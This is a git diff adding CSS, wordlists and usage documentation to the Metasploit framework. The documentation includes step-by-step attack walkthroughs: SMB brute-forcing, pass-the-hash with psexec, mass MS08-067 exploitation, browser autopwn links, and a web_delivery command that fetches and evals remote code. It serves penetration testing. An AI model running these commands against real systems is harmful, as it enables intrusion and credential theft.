@@ -0,0 +1,258 @@ +h1, h2, h3, h4, h5, h6, p, blockquote { + margin: 0; + padding: 0; +} +body { + font-family: Arial, "Helvetica Neue", Helvetica, "Hiragino Sans GB", sans-serif; + font-size: 16px; + line-height: 18px; + color: #737373; + margin: 10px 13px 10px 13px; +} +a { + color: #0069d6; +} +a:hover { + color: #0050a3; + text-decoration: none; +} +a img { + border: none; +} +p { + margin-bottom: 16px; +} +h1, h2, h3, h4, h5, h6 { + color: #404040; + line-height: 36px; +} +h1 { + margin-bottom: 18px; + font-size: 30px; +} +h2 { + font-size: 24px; + margin-bottom: 16px; +} +h3 { + font-size: 18px; + margin-bottom: 16px; +} +h4 { + font-size: 16px; + margin-bottom: 16px; +} +h5 { + font-size: 16px; + margin-bottom: 16px; +} +h6 { + font-size: 13px; + margin-bottom: 16px; +} +hr { + margin: 0 0 19px; + border: 0; + border-bottom: 1px solid #eee; +} +blockquote { + padding: 13px 13px 21px 15px; + margin-bottom: 18px; + font-family:georgia,serif; + font-style: italic; +} +blockquote:before { + content:"\201C"; + font-size:40px; + margin-left:-10px; + font-family:georgia,serif; + color:#eee; +} +blockquote p { + font-size: 16px; + font-weight: 300; + line-height: 18px; + margin-bottom: 0; + font-style: italic; +} +code, pre { + font-family: Monaco, Andale Mono, Courier New, monospace; +} +code { + background-color: #eee; + color: rgba(0, 0, 0, 0.75); + padding: 1px 3px; + font-size: 13px; + -webkit-border-radius: 3px; + -moz-border-radius: 3px; + border-radius: 3px; +} +pre { + display: block; + padding: 16px; + margin: 0 0 18px; + line-height: 16px; + font-size: 13px; + border: 1px solid #d9d9d9; + white-space: pre-wrap; + word-wrap: break-word; +} +pre code { + background-color: #fff; + color:#737373; + font-size: 13px; + padding: 0; +} +@media screen and (min-width: 768px) { + body { + width: 748px; + margin:10px auto; + } +} +#overview_info_button { + font-family:Arial, sans-serif; + font-size:16px; + padding:10px 5px; + border-style:solid; + border-width:1px; + 
border-color:#ccc; + color:#333; +} +#knowledge_base_button { + font-family:Arial, sans-serif; + font-size:16px; + padding:10px 5px; + border-style:solid; + border-width:1px; + border-color:#EEEEEE; + color:#C4C4C4; +} +#overview_info_button:hover, #knowledge_base_button:hover { + cursor: pointer; +} +#knowledge_base { + display: none; +} +#long_list { + height:280px; + overflow:auto; + border-style: solid; + border-width: 1px; + border-color: #ccc; + padding: 5px; +} + + +/* +Description: Foundation 4 docs style for highlight.js +Author: Dan Allen +Website: http://foundation.zurb.com/docs/ +Version: 1.0 +Date: 2013-04-02 +*/ + +pre code { + display: block; padding: 0.5em; + background: #eee; +} + +pre .decorator, +pre .annotation { + color: #000077; +} + +pre .attribute { + color: #070; +} + +pre .value, +pre .string, +pre .scss .value .string { + color: #d14; +} + +pre .comment { + color: #998; + font-style: italic; +} + +pre .function .title { + color: #900; +} + +pre .class { + color: #458; +} + +pre .id, +pre .pseudo, +pre .constant, +pre .hexcolor { + color: teal; +} + +pre .variable { + color: #336699; +} + +pre .javadoc { + color: #997700; +} + +pre .pi, +pre .doctype { + color: #3344bb; +} + +pre .number { + color: #099; +} + +pre .important { + color: #f00; +} + +pre .label { + color: #970; +} + +pre .preprocessor { + color: #579; +} + +pre .reserved, +pre .keyword, +pre .scss .value { + color: #000; +} + +pre .regexp { + background-color: #fff0ff; + color: #880088; +} + +pre .symbol { + color: #990073; +} + +pre .symbol .string { + color: #a60; +} + +pre .tag { + color: #007700; +} + +pre .at_rule, +pre .at_rule .keyword { + color: #088; +} + +pre .at_rule .preprocessor { + color: #808; +} + +pre .scss .tag, +pre .scss .attribute { + color: #339; +} \ No newline at end of file diff --git a/data/markdown_doc/payload_demo_template.erb b/data/markdown_doc/payload_demo_template.erb new file mode 100644 index 0000000000..ff6620a3aa --- /dev/null 
+++ b/data/markdown_doc/payload_demo_template.erb
@@ -0,0 +1,8 @@
+```
+msf > use <%= mod.fullname %>
+msf <%= mod.type %>(<%= mod.shortname %>) > show options
+ ... show and set options ...
+msf <%= mod.type %>(<%= mod.shortname %>) > generate
+```
+
+To learn how to generate <%= mod.fullname %> with msfvenom, please [read this](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom).
\ No newline at end of file
diff --git a/data/markdown_doc/post_demo_template.erb b/data/markdown_doc/post_demo_template.erb
new file mode 100644
index 0000000000..a934269b06
--- /dev/null
+++ b/data/markdown_doc/post_demo_template.erb
@@ -0,0 +1,44 @@
+There are two ways to execute this post module.
+
+**From the Meterpreter prompt**
+
+The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post
+module against that specific session:
+
+```
+meterpreter > run <%= mod.fullname %>
+```
+
+**From the msf prompt**
+
+The second is by using the "use" command at the msf prompt. You will have to figure out which
+session ID to set manually. To list all session IDs, you can use the "sessions" command.
+
+
+```
+msf > use <%= mod.fullname %>
+msf <%= mod.type %>(<%= mod.shortname %>) > show options
+ ... show and set options ...
+msf <%= mod.type %>(<%= mod.shortname %>) > set SESSION session-id
+msf <%= mod.type %>(<%= mod.shortname %>) > exploit
+```
+
+If you wish to run the post against all sessions from framework, here is how:
+
+1 - Create the following resource script:
+
+```
+
+framework.sessions.each_pair do |sid, session|
+ run_single("use <%= mod.fullname %>")
+ run_single("set SESSION #{sid}")
+ run_single("run")
+end
+
+```
+
+2 - At the msf prompt, execute the above resource script:
+
+```
+msf > resource path-to-resource-script
+```
\ No newline at end of file
diff --git a/data/markdown_doc/remote_exploit_demo_template.erb b/data/markdown_doc/remote_exploit_demo_template.erb
new file mode 100644
index 0000000000..ea72c5480f
--- /dev/null
+++ b/data/markdown_doc/remote_exploit_demo_template.erb
@@ -0,0 +1,99 @@ +**Using <%= mod.shortname %> against a single host** + +Normally, you can use <%= mod.fullname %> this way: + +``` +msf > use <%= mod.fullname %> +msf <%= mod.type %>(<%= mod.shortname %>) > show targets + ... a list of targets ... +msf <%= mod.type %>(<%= mod.shortname %>) > set TARGET target-id +msf <%= mod.type %>(<%= mod.shortname %>) > show options + ... show and set options ... +msf <%= mod.type %>(<%= mod.shortname %>) > exploit +``` + +**Using <%= mod.shortname %> against multiple hosts** + +But it looks like this is a remote exploit module, which means you can also engage multiple hosts. + +First, create a list of IPs you wish to exploit with this module. One IP per line. + +Second, set up a background payload listener. This payload should be the same as the one your +<%= mod.shortname %> will be using: + +1. Do: ```use exploit/multi/handler``` +2. Do: ```set PAYLOAD [payload]``` +3. Set other options required by the payload +4. Do: ```set EXITONSESSION false``` +5. Do: ```run -j``` + +At this point, you should have a payload listening. + +Next, create the following script. Notice you will probably need to modify the ip_list path, and +payload options accordingly: + +``` +<ruby> +# +# Modify the path if necessary +# +ip_list = '/tmp/ip_list.txt' + +File.open(ip_list, 'rb').each_line do |ip| + print_status("Trying against #{ip}") + run_single("use <%= mod.fullname %>") + run_single("set RHOST #{ip}") + run_single("set DisablePayloadHandler true") + + # + # Set a payload that's the same as the handler. + # You might also need to add more run_single commands to configure other + # payload options. 
+ # + run_single("set PAYLOAD [payload name]") + + run_single("run") +end +</ruby> +``` + +Next, run the resource script in the console: + +``` +msf > resource [path-to-resource-script] +``` + +And finally, you should see that the exploit is trying against those hosts similar to the following +MS08-067 example: + +``` +msf > resource /tmp/exploit_hosts.rc +[*] Processing /tmp/exploit_hosts.rc for ERB directives. +[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes) +[*] Trying against 192.168.1.80 + +RHOST => 192.168.1.80 +DisablePayloadHandler => true +PAYLOAD => windows/meterpreter/reverse_tcp +LHOST => 192.168.1.199 + +[*] 192.168.1.80:445 - Automatically detecting the target... +[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English +[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX) +[*] 192.168.1.80:445 - Attempting to trigger the vulnerability... +[*] Sending stage (957999 bytes) to 192.168.1.80 +[*] Trying against 192.168.1.109 +RHOST => 192.168.1.109 +DisablePayloadHandler => true +PAYLOAD => windows/meterpreter/reverse_tcp +LHOST => 192.168.1.199 +[*] 192.168.1.109:445 - Automatically detecting the target... +[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown +[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English +[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX) +[*] 192.168.1.109:445 - Attempting to trigger the vulnerability... +[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600 + +[*] Sending stage (957999 bytes) to 192.168.1.109 +[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600 +``` diff --git a/data/wordlists/adobe_top100_pass.txt b/data/wordlists/adobe_top100_pass.txt new file mode 100644 index 0000000000..f7d2a744be --- /dev/null +++ b/data/wordlists/adobe_top100_pass.txt 
@@ -0,0 +1,100 @@
+123456
+123456789
+password
+adobe123
+12345678
+qwerty
+1234567
+111111
+photoshop
+123123
+1234567890
+000000
+abc123
+1234
+adobe1
+macromedia
+azerty
+iloveyou
+aaaaaa
+654321
+12345
+666666
+sunshine
+123321
+letmein
+monkey
+asdfgh
+password1
+shadow
+princess
+dragon
+adobeadobe
+daniel
+computer
+michael
+121212
+charlie
+master
+superman
+qwertyuiop
+112233
+asdfasdf
+jessica
+1q2w3e4r
+welcome
+1qaz2wsx
+987654321
+fdsa
+753951
+chocolate
+fuckyou
+soccer
+tigger
+asdasd
+thomas
+asdfghjkl
+internet
+michelle
+football
+123qwe
+zxcvbnm
+dreamweaver
+7777777
+maggie
+qazwsx
+baseball
+jennifer
+jordan
+abcd1234
+trustno1
+buster
+555555
+liverpool
+abc
+whatever
+11111111
+102030
+123123123
+andrea
+pepper
+nicole
+killer
+abcdef
+hannah
+test
+alexander
+andrew
+222222
+joshua
+freedom
+samsung
+asdfghj
+purple
+ginger
+123654
+matrix
+secret
+summer
+1q2w3e
+snoopy1
diff --git a/data/wordlists/sap_default.txt b/data/wordlists/sap_default.txt
index 3f7a5321c3..752eb03d2b 100644
--- a/data/wordlists/sap_default.txt
+++ b/data/wordlists/sap_default.txt
@@ -16,4 +16,12 @@ SAPJSF ch4ngeme SAPR3 SAP CTB_ADMIN sap123 XMI_DEMO sap123 -
+IDEADM admin
+SMD_ADMIN init1234
+SMD_BI_RFC init1234
+SMD_RFC init1234
+SOLMAN_ADMIN init1234
+SOLMAN_BTC init1234
+SAPSUPPORT init1234
+CONTENTSERV init1234
+SMD_AGT init1234
diff --git a/documentation/modules/auxiliary/scanner/http/tomcat_mgr_login.md b/documentation/modules/auxiliary/scanner/http/tomcat_mgr_login.md
new file mode 100644
index 0000000000..9db11819dd
--- /dev/null
+++ b/documentation/modules/auxiliary/scanner/http/tomcat_mgr_login.md
@@ -0,0 +1,41 @@
+The auxiliary/scanner/http/tomcat_mgr_login works for Tomcat versions that uses HTTP
+authentication.
+
+Please note that for Tomcat 7 or newer, the roles required to use the manager application were
+changed from the single manager role to the following four roles:
+
+* manager-gui - Allows access to the HTML GUI and the status pages.
+* manager-script - Allows access to the text interface and the status pages.
+* manager-jmx - Allows access to the JMX and the status pages.
+* manager-status - allows access to the status pages only.
+
+Older versions of Tomcat came with default passwords enabled by default. For example:
+
+**Tomcat 4**
+
+| Username | Password | Role |
+| -------- | -------- | ------------- |
+| tomcat | tomcat | tomcat |
+| role1 | tomcat | role1 |
+| both | tomcat | tomcat, role1 |
+
+**Tomcat 5**
+
+Same as Tomcat 4
+
+Newer Tomcat versions have these passwords commented out.
+
+If you are using the default Metasploit credential lists, these usernames and passwords are already
+loaded.
+
+
+## Vulnerable Application
+
+To download the vulnerable application, you can find it here: https://tomcat.apache.org/whichversion.html.
+
+## Verification Steps
+
+1. Do: ```auxiliary/scanner/http/tomcat_mgr_login```
+2. Do: ```set RHOSTS [IP]```
+3. Set TARGETURI if necessary.
+4. Do: ```run```
diff --git a/documentation/modules/auxiliary/scanner/smb/smb_login.md b/documentation/modules/auxiliary/scanner/smb/smb_login.md
new file mode 100644
index 0000000000..b2f9b7903a
--- /dev/null
+++ b/documentation/modules/auxiliary/scanner/smb/smb_login.md
@@ -0,0 +1,117 @@
+The smb_login module is used to bruteforce SMB remotely. SMB credentials are extra valuable because they are system credentials, and you can probably reuse some of them to log in to more machines.
+
+## Vulnerable Application
+
+To use smb_login, make sure you are able to connect to a SMB service that supports SMBv1.
+
+## Verification Steps
+
+The following demonstrates a basic scenario of using the [built-in wordlists](https://github.com/rapid7/metasploit-framework/tree/master/data/wordlists) to brute-force SMB:
+
+```
+msf > use auxiliary/scanner/smb/smb_login
+msf auxiliary(smb_login) > set RHOSTS 192.168.1.80
+RHOSTS => 192.168.1.80
+msf auxiliary(smb_login) > set USER_FILE /Users/wchen/rapid7/msf/data/wordlists/unix_users.txt
+USER_FILE => /Users/wchen/rapid7/msf/data/wordlists/unix_users.txt
+msf auxiliary(smb_login) > set PASS_FILE /Users/wchen/rapid7/msf/data/wordlists/unix_passwords.txt
+PASS_FILE => /Users/wchen/rapid7/msf/data/wordlists/unix_passwords.txt
+msf auxiliary(smb_login) > run
+
+[+] 192.168.1.80:445 - 192.168.1.80:445 SMB - Success: '.\root:monkey' Administrator
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(smb_login) >
+```
+
+If you have a database connected, you should also see this credential logged:
+
+```
+msf auxiliary(smb_login) > creds
+Credentials
+===========
+
+host origin service public private realm private_type
+---- ------ ------- ------ ------- ----- ------------
+192.168.1.80 192.168.1.80 445/tcp (smb) root monkey Password
+
+msf auxiliary(smb_login)
+```
+
+## Options
+
+By default, the smb_login module only requires the RHOSTS option to run. But in reality, you will
+also need to supply user names and passwords. The following options are available to support
+different credential formats:
+
+**The USER_FILE option**
+
+If you happen to manage all the found user names in a separate file, then this option would be
+suitable for that. One per line.
+
+An example of setting USER_FILE:
+
+```
+set USER_FILE [path to file]
+```
+
+**The PASS_FILE option**
+
+If you happen to manage all the found passwords in a separate file, then this option would be
+suitable for that. One per line.
+
+```
+set PASS_FILE [path to file]
+```
+
+**The USERPASS_FILE option**
+
+If each user should be using a specific password in your file, then you can use this option. One
+username/password per line:
+
+```
+set USERPASS_FILE [path to file]
+```
+
+**The DB_ALL_CREDS option**
+
+This option allows you to reuse all the user names and passwords collected by the database:
+
+```
+set DB_ALL_CREDS true
+```
+
+**The DB_ALL_PASS option**
+
+This option allows you to reuse all the passwords collected by the database.
+
+```
+set DB_ALL_PASS true
+```
+
+**The DB_ALL_USERS option**
+
+This option allows you to reuse all the user names collected by the database.
+
+```
+set DB_ALL_USERS true
+```
+
+**The SMBUser option**
+
+If you are testing a specific user, use this option.
+
+```
+set SMBUser [user name]
+```
+
+**The SMBPass option**
+
+If you are testing a specific password, use this option.
+
+```
+set SMBPass [password]
+```
+
+Note: If an account has been successfully brute-forced, that account will not be tried again.
+
diff --git a/documentation/modules/auxiliary/server/browser_autopwn2.md b/documentation/modules/auxiliary/server/browser_autopwn2.md
new file mode 100644
index 0000000000..c09b71ff47
--- /dev/null
+++ b/documentation/modules/auxiliary/server/browser_autopwn2.md
@@ -0,0 +1,176 @@
+Browser Autopwn 2 is a complete redesign from the first one, so quite a few things will look and
+feel different for you. Here are the features you should know about before using.
+
+## Vulnerable Applications
+
+Browser Autopwn 2 is capable of targeting popular browsers and 3rd party plugins, such as:
+
+* Internet Explorer
+* Mozilla Firefox
+* Adobe Flash
+* Java
+* ActiveX
+* Silverlight
+
+## Exploit URLs
+
+Normally, the only URL you need to care about is the **BrowserAutoPwn URL**. This is the URL
+you should send to the targets you wish to attack.
+
+For debugging purposes, you can also see each browser exploit's specific URL path. You can do so
+by setting the VERBOSE option to true in msfconsole, like this:
+
+```
+set VERBOSE true
+```
+
+And then when you run the module, there will be a list showing all the exploits that might be
+used, including the URLs.
+
+## Browser Autopwn 2 Options
+
+**The HTMLContent Option**
+
+The HTMLContent option allows you to serve a basic HTML web page to the browser instead of having a
+blank one. It supports two syntaxes.
+
+This example will basically print "Hello world!" on the browser while exploits are tested against
+it.
+
+```
+set HTMLContent Hello world!
+```
+
+This example will load file /tmp/hello_world.html and that's what the browser will see. Most likely
+the second syntax is how you'd want to use the Content option.
+
+Keep in mind that you should probably try to keep HTMLContent as simple as possible, otherwise
+there is a possibility that it might actually influence the reliability of the exploits, especially
+the ones that do memory corruption.
+
+**The EXCLUDE_PATTERN option**
+
+The EXCLUDE_PATTERN option is used for excluding exploit file names you don't want Browser
+Autopwn 2 to use. This is a regex type option, you can be creative about this.
+
+For example, Adobe Flash exploits in Metasploit tend to have the same file name that begins with:
+"adobe_flash_", so to exclude those, you can do:
+
+```
+set EXCLUDE_PATTERN adobe_flash
+```
+
+**The INCLUDE_PATTERN option**
+
+The INCLUDE_PATTERN option is for loading specific exploits that you want Browser Autopwn 2 to use.
+Let's reuse the Adobe Flash file name example, if you only want Flash exploits, you can do:
+
+```
+set INCLUDE_PATTERN adobe_flash
+```
+
+If you set both INCLUDE_PATTERN and EXCLUDE_PATTERN, the evaluation for INCLUDE_PATTERN will kick
+in first, followed by EXCLUDE_PATTERN.
+
+**The MaxExploitCount option**
+
+The MaxExploitCount option is for specifying how many exploits you want Browser Autopwn 2 to load.
+By default, it's 21. But you can try to bump it up a little bit if you wish to try more exploits.
+Note that by doing so you are also allowing more lower ranking modules to kick in, you will have
+to figure out the sweet spot for it. An example of setting it:
+
+```
+set MaxExploitCount 30
+```
+
+**The MaxSessionCount option**
+
+The MaxSessionCount option is for limiting how many sessions to get. It may sound a little odd at
+first because why would you want to do that, right? Well, a use case for this is when you don't
+actually want to pop shells, instead you just want to know what exploits could be used, this is
+something you can try. You can also use this if you don't want your attack to stay open the whole
+time:
+
+```
+set MaxSessionCount 10
+```
+
+**The ShowExploitList option**
+
+The ShowExploitList option means displaying a list of exploits specific to each browser/client.
+As we've explained before, when BAP2 loads 21 exploits, probably not all 21 will be served to
+the browser, only some of them.
In order to see those ones, you need to set this option:
+
+```
+set ShowExploitList true
+```
+
+**The AllowedAddresses option**
+
+The AllowedAddresses option is for attacking a specific range of IPs as a way to avoid penetration
+testing accidents. For example, when you send a malicious link to a specific person, that person
+may actually share it with his friends, family or other people, and those people aren't your
+targets so you shouldn't hit them. Well, Browser Autopwn doesn't know that, so one of the ways to
+avoid that is to create a whitelist.
+
+The option also supports two syntaxes. This is most likely how you will set it:
+
+```
+set AllowedAddresses file:///tmp/ip_list.txt
+```
+
+The above will load file ip_list.txt. In that file, one IP per line.
+
+
+**The ExploitReloadTimeout option**
+
+The ExploitReloadTimeout is for setting how long BAP2 should wait before loading the next exploit.
+By default, it's 3 seconds, but in case some exploits need more time (for example, longer time to
+groom the heap, load other things, or it's doing a sleep somewhere), you will need to set this.
+In most cases, you shouldn't have to.
+
+Here's an example of setting it to 5 seconds:
+
+```
+set ExploitReloadTimeout 5000
+```
+
+## Scenarios
+
+By default, Browser Autopwn 2 goes through the entire exploit module tree, and will try to use
+different types of exploits - Firefox, Internet Explorer, Adobe Flash, Android, etc. If you want to
+test a specific application, basically all you need to do is setting the
+INCLUDE_PATTERN option (or maybe EXCLUDE_PATTERN).
+
+However, there is another trick to make this task even easier. BAP2 also comes with the following
+resource scripts that can automatically do this:
+
+* bap_firefox_only.rc - For testing Firefox
+* bap_flash_only.rc - Fore testing Adobe Flash
+* bap_ie_only.rc - For testing Internet Explorer
+* bap_dryrun_only.rc - Rickrolls the target, and shows you all the suitable exploits against that target.
No exploits will actually be fired.
+
+Here's an example of using bap_flash_only.rc to test Adobe Flash vulnerabilities:
+
+```
+$ ./msfconsole -q -r scripts/resource/bap_flash_only.rc
+```
+
+## Logging
+
+In addition, when a browser connects to BAP, this link-clicking event is also logged to the
+database as a "bap.clicks" note type. If the ShowExploitList option is set to true, that will also
+save the exploit list information so that after testing you can go back to the database and see
+which users are vulnerable to what exploits.
+
+Even if you don't set the ShowExploitList option, the logged link-clicking event data is more than
+enough to prove that the user was social-engineered, which is still a security risk.
+
+To see all the bap.clicks events, in msfconsole do:
+
+```
+notes -t bap.clicks
+```
+
+From there, you can do additional analysis of these notes, put it on your report, and hopefully
+do something about it.
diff --git a/documentation/modules/exploit/multi/script/web_delivery.md b/documentation/modules/exploit/multi/script/web_delivery.md
new file mode 100644
index 0000000000..91c213f82d
--- /dev/null
+++ b/documentation/modules/exploit/multi/script/web_delivery.md
@@ -0,0 +1,76 @@
+As a web server, the web_delivery module provides a stealthy way to deliver a payload during post exploitation because the payload does not touch the disk.
+
+Currently, web_delivery supports three different languages for delivery: Python, PHP, and
+Powershell. You should be able to tell which one you can use based on the target environment
+you are in.
+
+For example, if you gained access through a PHP application, it's safe to assume you can use PHP. If you're in a Windows server, such as Windows Server 2008, then it's probably safe to say the target supports Powershell.
+
+## Verification Steps
+
+To be able to use the web_delivery module, you must gain access to the target machine first, with the ability to execute either the Python, or PHP, or Powershell interpreter.
+
+At that point, you would use the web_delivery module like in the following example:
+
+1. Start msfconsole
+2. Run: ```use exploit/multi/script/web_delivery```
+3. Run: ```set target 1``` (1 is PHP. You can use ```show targets``` to see other options)
+4. Run: ```set PAYLOAD php/meterpreter/reverse_tcp``` (You can do ```show payloads``` to see what options are suitable for the target)
+5. Run: ```set LHOST IP``` (The IP the payload should connect back to)
+6. Do: ```run```
+7. At this point, a handler is up for that payload, and the module should instruct you to execute a command.
+8. Copy the command. Depending on your pentesting scenario, you can either inject the
+ command and get code execution, or run it from the target's shell and get a session:
+
+```
+msf exploit(web_delivery) > run
+[*] Exploit running as background job.
+
+[*] Started reverse TCP handler on 172.16.23.1:4444
+msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:8080/z5inGkwCCQiz9
+[*] Local IP: http://10.6.0.86:8080/z5inGkwCCQiz9
+[*] Server started.
+[*] Run the following command on the target machine:
+php -d allow_url_fopen=true -r "eval(file_get_contents('http://172.16.23.1:8080/z5inGkwCCQiz9'));"
+[*] Delivering Payload
+[*] Sending stage (33684 bytes) to 172.16.23.134
+[*] Meterpreter session 1 opened (172.16.23.1:4444 -> 172.16.23.134:41684) at 2016-03-02 11:41:34 -0600
+```
+
+## Targets
+
+**Python**
+
+Python is a fairly popular language, especially on Unix-based systems. By default, it has come with Ubuntu Linux since 8.04, as well as Debian, and Mac OS X since 10.3.
+
+**PHP**
+
+PHP is a fairly popular language for web servers, especially Apache.
+
+**Powershell/Windows**
+
+Powershell is a popular language for newer Windows systems. Windows 7 and Windows Server 2008 R2
+are the first Windows versions to come with Powershell by default. Older Windows systems such as XP
+don't come with it by default, but it is still possible to see it installed on a corporate network.
+
+## Scenarios
+
+**Against a compromised web application**
+
+web_delivery would work nicely for a web application with a command execution vulnerability.
+
+One way to approach this would be:
+
+1. Start exploit/multi/script/web_delivery
+2. Use [Burp Suite](https://portswigger.net/burp/) to intercept the HTTP/HTTPS request, place the command in the parameter that results in arbitrary code execution.
+3. Hopefully the modified HTTP/HTTPS request is successful, and you should get a session.
+
+**Shell upgrade**
+
+web_delivery is also useful to upgrade a shell type payload to a Meterpreter one.
+
+Here's how that can be done:
+
+1. Start exploit/multi/script/web_delivery that generates/
+2. In msfconsole, interact with the shell, and copy/paste the command.
+3. You should get a Meterpreter session.
diff --git a/documentation/modules/exploit/windows/smb/ms08_067_netapi.md b/documentation/modules/exploit/windows/smb/ms08_067_netapi.md
new file mode 100644
index 0000000000..6af5b746ad
--- /dev/null
+++ b/documentation/modules/exploit/windows/smb/ms08_067_netapi.md
@@ -0,0 +1,59 @@
+ms08_067_netapi is one of the most popular remote exploits against Microsoft Windows. It is
+considered a reliable exploit, and allows you to gain access as SYSTEM - the highest Windows
+privilege. In modern day penetration test, this exploit would most likely be used in an internal
+environment, and not so much from external due to the likelihood of a firewall.
+
+The check command of ms08_067_netapi is also highly accurate, because it is actually testing the
+vulnerable code path, not just passively.
+
+
+## Vulnerable Application
+
+This exploit works against a vulnerable SMB service from one of these Windows systems:
+
+* Windows 2000
+* Windows XP
+* Windows 2003
+
+To reliability determine whether the machine is vulnerable, you will have to either examine
+the system's patch level, or use a vulnerability check.
+
+## Verification Steps
+
+Please see Basic Usage under Overview.
+
+## Options
+
+Please see Required Options under Overview.
+
+## Scenarios
+
+**Failure to detect the language pack**
+
+On some Windows systems, ms08_067_netapi (as well as other SMB modules) might show you this
+message:
+
+
+> Windows 2003 R2 Service Pack 2 - lang:Unknown
+
+
+This is because the targeted system does not allow itself to be enumerated without authentication.
+In this case, either you can set the username and password to be able to use automatic detection,
+like this:
+
+```
+set SMBUSER [username]
+set SMBPASS [password]
+```
+
+Or you must manually set the target with the correct language, for example:
+
+```
+set target [target ID]
+```
+
+**Unsafe configuration of LHOST**
+
+Although ms08_067_netapi is reliable enough for a memory corruption exploit, it has its own
+denial-of-service moments. One scenario is when the LHOST option is incorrectly configured,
+which could result the SMB to crash.
diff --git a/documentation/modules/exploit/windows/smb/psexec.md b/documentation/modules/exploit/windows/smb/psexec.md
new file mode 100644
index 0000000000..de541f95b7
--- /dev/null
+++ b/documentation/modules/exploit/windows/smb/psexec.md
@@ -0,0 +1,120 @@
+psexec is one of the most popular exploits against Microsoft Windows. It is a great way to test password security and demonstrate how a stolen password could lead to a complete compromise of an entire corporate network.
+
+The Metasploit Framework actually includes different module types of psexec for different scenarios. exploit/windows/smb/psexec is the father of them all and is used the same way
+you normally would with any Metasploit exploits.
+
+
+## Vulnerable Application
+
+To be able to use exploit/windows/smb/psexec:
+
+1. You must have a valid username/password.
+2. The firewall must allow SMB traffic.
+3. The target must use SMBv1.
+4. The remote Windows machine's network security policy must allow it. If you see [one of these errors](https://github.com/rapid7/metasploit-framework/wiki/What-does-my-Rex%3A%3AProto%3A%3ASMB-Error-mean%3F), then the Windows machine does not allow it.
+
+## Verification Steps
+
+At the minimum, you should be able use psexec to get a session with a valid credential using the following:
+
+```
+msf > use exploit/windows/smb/psexec
+msf exploit(psexec) > set RHOST 192.168.1.80
+RHOST => 192.168.1.80
+msf exploit(psexec) > set SMBUser Administrator
+SMBUser => Administrator
+msf exploit(psexec) > set SMBPass goodpass
+SMBPass => goodpass
+msf exploit(psexec) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.199:4444
+[*] 192.168.1.80:445 - Connecting to the server...
+[*] 192.168.1.80:445 - Authenticating to 192.168.1.80:445 as user 'Administrator'...
+[*] 192.168.1.80:445 - Selecting native target
+[*] 192.168.1.80:445 - Uploading payload...
+[*] 192.168.1.80:445 - Created \PTIhqIrQ.exe...
+[+] 192.168.1.80:445 - Service started successfully...
+[*] 192.168.1.80:445 - Deleting \PTIhqIrQ.exe...
+[*] Sending stage (957999 bytes) to 192.168.1.80
+[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1042) at 2016-03-01 16:51:56 -0600
+
+meterpreter >
+```
+
+## Options
+
+By default, using exploit/windows/smb/psexec can be as simple as setting the RHOST option, and you're ready to go. But in reality, you will probably need to at least configure:
+
+**The SMBUser Option**
+
+This is a valid Windows username.
+
+**The SMBPass option**
+
+This can be either the plain text version or the Windows hash.
+
+## Scenarios
+
+
+**Pass the Hash**
+
+One common penetration testing scenario using psexec is that attackers usually begin by breaking into a box, dumping the hashes, and using some of those hashes to log into other boxes on the network using psexec. So in that scenario, with the following stolen hash:
+
+```
+meterpreter > hashdump
+Administrator:500:e39baff0f2c5fd4e93e28745b8bf4ba6:f4974ee4a935ee160a927eafbb3f317f:::
+```
+
+You can simply copy and paste it to the SMBPass option in psexec and get a session without needing to crack the hash:
+
+```
+msf > use exploit/windows/smb/psexec
+msf exploit(psexec) > set SMBUser Administrator
+SMBUser => Administrator
+msf exploit(psexec) > set SMBPass e39baff0f2c5fd4e93e28745b8bf4ba6:f4974ee4a935ee160a927eafbb3f317f
+SMBPass => e39baff0f2c5fd4e93e28745b8bf4ba6:f4974ee4a935ee160a927eafbb3f317f
+msf exploit(psexec) > set RHOST 192.168.1.80
+RHOST => 192.168.1.80
+msf exploit(psexec) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.199:4444
+[*] 192.168.1.80:445 - Connecting to the server...
+[*] 192.168.1.80:445 - Authenticating to 192.168.1.80:445 as user 'Administrator'...
+[*] 192.168.1.80:445 - Selecting native target
+[*] 192.168.1.80:445 - Uploading payload...
+[*] 192.168.1.80:445 - Created \QpxKDHyG.exe...
+[+] 192.168.1.80:445 - Service started successfully...
+[*] 192.168.1.80:445 - Deleting \QpxKDHyG.exe...
+[*] Sending stage (957999 bytes) to 192.168.1.80
+[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1043) at 2016-03-01 17:02:46 -0600
+
+meterpreter >
+```
+
+**Automatic Target**
+
+There are multiple targets available for exploit/windows/smb/psexec. The Automatic target is the default target. If the Automatic target detects Powershell on the remote machine, it will try Powershell, otherwise it uses the natvie upload. Each target is explained below.
+
+**Powershell Target**
+
+The Powershell target forces the psexec module to run a Powershell command with a payload embedded in it. Since this approach does not leave anything on disk, it is a very powerful way to evade antivirus. However, older Windows machines might not support Powershell by default.
+
+Because of this, you will probably want to use the Automatic target setting. The automatic mode will check if the target supports Powershell before it tries it; the manually set Powershell target won't do that.
+
+**Native Upload Target**
+
+The Native target will attempt to upload the payload (executable) to SYSTEM32 (which can be modified with the
+SHARE datastore option), and then execute it with psexec.
+
+This approach is generally reliable, but has a high chance of getting caught by antivirus on the target. To counter this, you can try to use a template by setting the EXE::Path and EXE::Template datastore options. Or, you can supply your own custom EXE by setting the EXE::Custom option.
+
+**MOF Upload Target**
+
